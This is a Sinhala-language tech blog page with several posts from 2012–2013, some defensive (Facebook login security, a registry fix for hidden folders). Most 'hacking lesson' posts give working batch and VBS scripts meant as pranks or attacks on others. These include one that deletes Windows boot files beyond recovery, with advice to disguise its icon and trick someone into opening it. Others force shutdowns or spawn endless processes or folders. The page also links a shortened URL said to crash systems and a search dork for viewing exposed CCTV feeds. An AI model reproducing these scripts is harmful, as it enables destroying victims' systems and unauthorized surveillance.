Slide # 1

NEED FOR SPEED RIVALS ® නොමිලේ

මේක Need For Speed ක්‍රීඩා මාලාවේ අලුත්ම එළිදැක්වීම..''RIVALS'' තමයි නම.. මේ ක්‍රීඩාව Action හා Racing කියන කොටසට තමයි අයත් වෙන්නේ Read More

Slide # 2

Desktop එක ලස්සන කරගමු

හැමදාම දකින කුකුලගේ කරමලේ සුදුයි වගේ දැකල දැකලම වින්ඩෝස් 7 වල Default View එක එපා වෙලාද? එහෙනම් පොඩ්ඩක් බැලුවනම් ඔය උඩ තියන පින්තූරය දිහා :D හොදයිද? Read More

Slide # 3

100%ක් INTERNET SPEED එක සුපිරියට වැඩි කරගමු

මම දන්නවා ගොඩක් අය තමන්ගේ අන්තර්ජාල වේගය කොච්චර තිබ්බත් මදි කියලනේ හිතන්නේ Read More

Slide # 4

PEN DRIVE එකෙන් ඕනෑම වින්ඩෝස් එකක් දාමු

ගොඩක් අයට තියන ප්‍රශ්නයක් තමයි වින්ඩෝස් දාන්න CD/DVD අවශ්‍ය එක.. ඔන්න අද කියන්න යන්නේ Pen Drive එකකින් වින්ඩෝස් දාන විදිහයි Read More

Slide # 5

ඔබේ කාමරය WI-FI කලාපයක් කරගන්න

කොහොමද ඔයාගේ කාමරේ Wi-Fi Zone එකක් කරගන්න තියනවනම් නේද? ආව් ආව් කටට ආව හිනාව නේද? ඔව් ඔව් එක තමයි මේ කරන්න හදන්නේ Read More

Showing posts with label හැකින් කුප්පිය. Show all posts
Showing posts with label හැකින් කුප්පිය. Show all posts

Tuesday, March 26, 2013

ෆෙස්බුකිය හැක් නොවී බේරාගනිමු [[Hacking Part II]]


මම මේ පොස්ට් එක දාන්නේ අද පෝය දවසක් වෙලත් උදේ පාන්දරම එකෙක් මට පිශින් පාරක් දීලා මාව හැක් කොරන්න හැදුව.....................
උගේ හිතේ මම පිශින්ග් කන්න තරම් ඔටුවෙක් කියල. ලෝල්
දැන් කාලේ ම(ර්)කා වත් හැක් වෙන සයිස් එකක් තියෙන්නේ හෙහෙ :P






බය වෙන්න ඔනේ නැහැ මම අද කියල දෙන්න යන්නේ ඔය මහා ලොකු හැක් කෙරුවාවෙන් බේරෙන හැටි........
මේ එක කරන විදිය ගොඩ දෙනෙක් දන්නවත් ඇති එත් මේක කියල දෙන්නේ නොදන්නා අයටයි..... එහෙනම් අපි වැඩේට බහිමු.........
මුලින්ම ඔයාලගේ Facebook Account එකට ලොග් වෙන්න.......
දැන් මෙන්න මේ ලින්ක් එකට යන්න ............. https://www.facebook.com/settings?tab=security
ඊට පස්සේ ඕකේ තියෙන Secure Browsing  කියන එකට හරියක් දාන්න.
දැන් Login Notification යන්න. ඒකේ තියෙන Email/Text Massege,Push Notification කියන තුනටත් හරියක් දාන්න........ දැන් Login Approvals ගිහින් Require a Security code to access my account  from unkonwn browsers කියන එකට හරියක් දාල ඊළගට එන බොක්ස් එකේ ඔයාගේ දුරකථන අංකය දාල Next කොරන්න.
දැන් ඔයාගේ ෆෝන් එකට +32665 කියන නම්බර් එකෙන් පණිවිඩියක් එයි......
ඊට පස්සේ පණිවිඩයේ තියෙන රහස්‍ය අංකය ඇතුලත් කරලා Submit කරන්න.........
දැන් ඔයාගේ කොමේ නම ඉල්ලනවා ඒකට ඔය මොකක් හරි එකක් දීල... Next කරන්න
හරි අපේ වැඩේ ඉවරයි

දැන් උබල ඕන එකෙක්ට චැල්ලේන්ජ් කරපල්ලා.......



එහෙනම් මම කැපෙන්නම් නේ අහ්හ්හ්හ්හ්හ්හ්හ්හ්හ්හ්හ්හ් මොකක් හරි අවුලක් ගියොත් කොමෙන්ටුවක් දාන්න..  මම ගියෝ




Saturday, February 9, 2013

ලොව වටා CCTV හැක් කරමු



ඔන්න ඉතින් තව පොඩි කුප්පියක් අරගෙන ආවා.. පොඩි කුප්පියක් කිව්වට මේකෙත් අමුතුම ගතියක් තියනවා.. මොකෝ කියන්නේ ඕනෑම කෙනෙකුට ලෝකේ වටේ තියන CCTV ගෙදර ඉදන්ම බලන්න පුළුවන් චාන්ස් එකක් දෙනවා කිව්වොත්... ම්ම්ම්ම් එහෙමද ආස.. :D ලොලේ ලොල් කියල එහෙනම් අද කුප්පියෙන් දෙන්න යන්නේ එක එක තැන්වල තියන CCTV වලින් බලන්නේ කොහොමද කියලයි.. ඈ ඈ .. එතකොට ආව හිනාව නේද.. ඇති ඇති පැණි හිනාව.. යාපනේ ඉදලා හම්බන්තොටට පේනවා.. :D හරි එහෙනම් මෙන්න මෙහෙමලු වෙන්නේ හරිද.. මේක වෙන්නේ ඔන්ලයින් හොදද.. නැතුව ඉතින් Live CCTV අහවල් විදිහට බලන්නද නේද ... :D 

බීච් වල, හොටෙල් වල, රෙස්ටෝරන්ට් වල, මහා පාරවල්වල, පාක් වල, නයිට් ක්ලබ් වල(ත් ඇති :D) එහෙම තියන CCTV,LiveCam විවිධ ආරක්ෂක හා වෙනත් හේතු උඩ සජීවීව අන්තර්ජාලයට යොමු කරලා තියනවා.. ඔන්න අපි කොරන්ට හදන්නේ අන්න එව්වට හොම්බ දාන එකයි... අනුන්ගේ එව්වට හොම්බ දාද්දීත් අමුතුම පාට පාට ගතියක් තියනවනේ.. :D එහෙනම් වැඩේ පටන්ගමු නේද ? 

දැනට ඉතින් ලංකාවේ කියල CCTV තියෙන්නේ කොලොම්පුරේ විතරනේ.. තව ඉස්සරහට මුළු ලංකාවේම වැඩ කෑලි ගෙදර ඉදලම බලාගන්න පුළුවන් වේවි..

මෙන්න මෙතන කොටන්න.. Search Result එකින් එක බලන්නකෝ.. එක එක CCTV හම්බ වෙයි..

එහෙම නැතිනම් අපේ සයිබර් දෙයියා ගූගල් ගොයියා වෙතට ගිහින් පහල තියන ටික කොටන්න.. එතකොට එන Result වලින් තියෙන්නේ ඔය කලින් කිව්ව CCTV තමා.. පොඩ්ඩක් කරක් ගහල හොයාගන්න පුළුවන් අවශ්‍ය දේවල්... (මමනම් දන්නේ නෑ මොනවද කියලා) 

මෙන්න තියනවා කොටන්න ඕන ටික..
inurl:view/index:shtml

හරි එහෙනම් ඔන්න ඒ කුප්පියත් ඉවර කළා හොදේ.. ඉතාමත් ඉක්මනට තවත් ආස හිතෙන මේ වගේම එල ලිපියකින් සෙට් වෙමු ඈ..

එහෙනම්..
ඔබට ජය වේවා..!!

Monday, December 31, 2012

තවත් අලුත් වයිරස් හදන ක්‍රම දෙකක්


ඔන්න ඉතින් තවත් කුප්පියක් දෙන්නයි සූදානම.. අද දෙන්න හදන්නේ තවත් වයිරස් හදන ක්‍රම දෙකක්. මම මීට කලිනුත් ලිපි දෙකක් දුන්නනේ මෙව්වා ගැන නේද?  අද ඔන්න තවත් එකක් දාන්න හදන්නේ.. 

එහෙනම් කෙලින්ම වැඩේට බහිමු නේද?


TRY AT YOUR OWN RISK

1.පරිගණකයක් Shut Down කරවමු.

wx@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s


ඔන්න ඔය ටික Notepad එකක ටයිප් කරන්න. ඔය I don't like you කියලා තියන ටික වෙනුවට ඔයාලට අවශ්‍ය දෙයක් ටයිප් කරන්න. එතකොට ඕක ඕපන් කලාම ඒ මැසේජ් එක වැටිලා එකපාරටම පරිගණකය Off වෙනවා. ඒ කියන්නේ Force Shutdown එකක්. ඔය ෆයිල් එක සේව් කරගන්න ඕනා අන්තිමට .BAT කියලා දීලා.
උදා:-Athwela.BAT

2.නොනවත්වා Notepad එක ඕපන් කරවමු

@ECHO off
:top
START %SystemRoot%\system32
notepad.exe
GOTO top 


ඔය ටිකත් අර කලින් වගේම Notepad එකක ටයිප් කරලා .BAT කියලා සේව් කරන්නයි තියෙන්නේ.

හරි එහෙනම් ඒ කුප්පියත් මේ විදිහට නිමා වූ වගයි කියන්නේ.. තව ඉස්සරහට හොද හොද වැඩ කෑලි දාන්නම්කො... ඔක්කොම එකට දැම්මොත් අගයකුත් නෑ කියනවනේ නේද?

ආයෙත් මේ වගේම කුප්පියකින් හම්බවෙමු..

එහෙනම්..
ඔබට ජය වේවා..!!

[Solved] Hidden Folders පෙන්නන්නේ නැති වයිරස් එකෙන් බේරෙමු

ඔන්න ඉතින් 2013ත් ලැබුවා කියන්නේ නේද? එහෙනම් ඔක්කොටොම කලින් හැමෝටම සුබම සුබ අලුත් අවුරුද්දක් කිව්වා ඔන්න.. හා හා පුරා කියලා ඔන්න එහෙනම් මේ අවුරුද්දේ පලවෙනි පෝස්ටුව දාන්න හදන්නේ.. අලුත් අවුරුද්දේ මුලින්ම හොද වැඩක් කරන්න හිතාගෙන ඔන්න එහෙනම් අද තවත් වයිරස් එකකින් නිදහස් වෙන විදිහ කියල දෙන්නයි හදන්නේ. 

අපිට ගොඩක්ම වයිරස්වලින් සිද්ද වෙන අකරතැබ්බයක් තමයි Hide කරපු Folder පේන්නේ නැතුව යන එක. මේ සිද්දියට අහුවෙච්ච කෙනෙක් නැති තරම්.. ගොඩක් අය කරන්නේ මේක හැදුන ගමන් Format පාරක් දෙන එකනේ. ඒක ඉතින් අර අතීසාරෙට මොකක්ද එකක් ගහනවා වගේ වැඩක්නේ... ඔන්න එහෙනම් දැන් කියන්නේ යන්නේ කිසිම අතුරු ආන්තරාවක් නොවී විනාඩි දෙකෙන් මේ වයිරස් එකෙන් නිදහස් වෙන විදිහයි. දැන් විස්තරේ දාන්න යන්නේ. අන්තිමටම වීඩියෝ එකකුත් තියනවා අවුලක් වගේනම් බලන්න.

පියවර ටික පැහැදිලිව එකින් එක මෙන්න තියනවා වැඩේ කරගන්න.

Run එකට ගිහින් "regedit" කියල ගහල Enter ඔබන්න. එතකොට Registry Editor එක එයි.

දැන් මේ පහල තියන විදිහට පිළිවෙලට යමු එහෙනම්.

1.HKEY_LOCAL_MACHINE
2.SOFTWARE
3.Microsoft
4.Windows
5.Current Version
6.Explorer
7.Advanced
8.Folder
9.Hidden
10.SHOWALL

ඔන්න ඔතනට එනකල් ආවම මෙන්න මේ පහල වගේ තමයි තියෙන්නේ. 


දැන් ඔය දකුණු පැත්තේ වැටෙන්නේ ඒ ෆෝල්ඩරේ ඇතුලේ තියන ෆයිල් ටික. එතන තියන "Checkedvalue" කියන ෆයිල් එක ඩබල් ක්ලික් කරලා ඕපන් කරගන්න. එතකොට මේ පහල වගේ එයි.


එතන Value data කියන එකට " 1 " දීලා Base එක Hexadecimal විදිහට හදලා OK කරන්න. 

දැන් රෙජිස්ට්‍රි එඩිටරේ ක්ලෝස් කරලා මැෂින් එක රීස්ටාට් පාරක් දාන්න. ඔන්න එතකොට වැඩේ හරි. වයිරස් ගොයියා ආගිය අතක් නැති වෙලා ඇති..

වැඩි හොදට මේ වීඩියෝ එකත් බලන්නකෝ ඔන්න...



හරි ඔන්න කුප්පියනම් ඉවරයි... තවත් එල කුප්පියකින් හම්බවෙමු ඈ..

එහෙනම්..
ඔබට ජය වේවා..!!

Tuesday, December 18, 2012

Hack කරන එක රිදෙන්නම කරමු



මුලින්ම කියන්නම් මේ ලිපිය මම දෙන්නේ එක්කෙනෙක් මට දුන්න කින්ඩි ටෝක් එකකට රිප්ලයි විදිහට.. මිනිහා මට වයිරස් ගැන උගන්නන්න එනවා. හරි හරි.. කෝන්තර ඉවරයි.. වැඩේ පට්ටාන් ගම්මු..

                       "DO AT YOUR OWN RISK"

ඔක්කොටම කලින් දැක්ක නේද ඔය දිලිසි දිලිසි රතු අකුරින් තියන එක. හරි හරි එහෙනම් වැඩේ මෙහෙමයි. අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.


1. URL එකකින් සිස්ටම් එක Crash කරමු.

මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- Athwela.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top 

එහෙනම් අදට කුප්පිය ඉවරයි... තව ඉස්සරහට මේ වගේ දේවල් දෙන්නම්කො..

එහෙනම්..
ඔබට ජය වේවා..!!

Monday, December 17, 2012

ජොලියට Virus එකක් හදමුද?



මේක පොඩි සොමි වැඩක්. කෙටියෙන්ම කිව්වොත් හුදෙක් ජොලියට පමණයි. අනිත් එක තමයි බය නැතුව උත්සහ කරලා බලන්න මම මේක කරලා බලල තමයි මේ පෝස්ට් එක දාන්නේ.. කිසිම රිස්ක් එකක් නැහැ. මේකෙන් කරන්නේ නොනවත්වා CD/DVD Rom Drive එක එලියට එන එකයි. මෙහෙමයි වැඩේ වෙන්නේ. පහල තියන Text ටික Notepad එකක පේස්ට් කරගන්න.


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


ඊට පස්සේ සේව් කරගන්න මොකක්හරි නමක් දීල අන්තිමට .vbs කියලා දෙන්න.
උදා:- Athwela.vbs
අන්න ඒ වගේ..

ඊට පස්සේ ඒක ඕපන් කරන්න. වැඩේ වෙනවා නේද? සොමියක් ගන්න පුළුවන් වැඩක් නේද? යාලුවෙක්ට එහෙම මේක කලාම අම්මෝ දැනෙන සනීපෙ නේද? හොදයි දැන් ඕක කළා වගේ නෙමෙයි නවත්තන්නත් දැනගෙන ඉන්න ඕනනේ..

මෙහෙමයි නවත්තන්නේ..
එක්කෝ Close කරන්න. ඒක හරියන්නේ නැත්තම් විතරක්..
Alt+Ctrl+Delete යතුරු ඔබලා Task Manager එක ගන්න.
දැන් Process ටැබ් එකට යන්න.
එකේ ඇති wscript.vbs කියලා.
ඒක ක්ලික් කරලා End Process දෙන්න.

වැඩේ හරි නේද? 
එහෙනම්..
ඔබට ජය වේවා..!!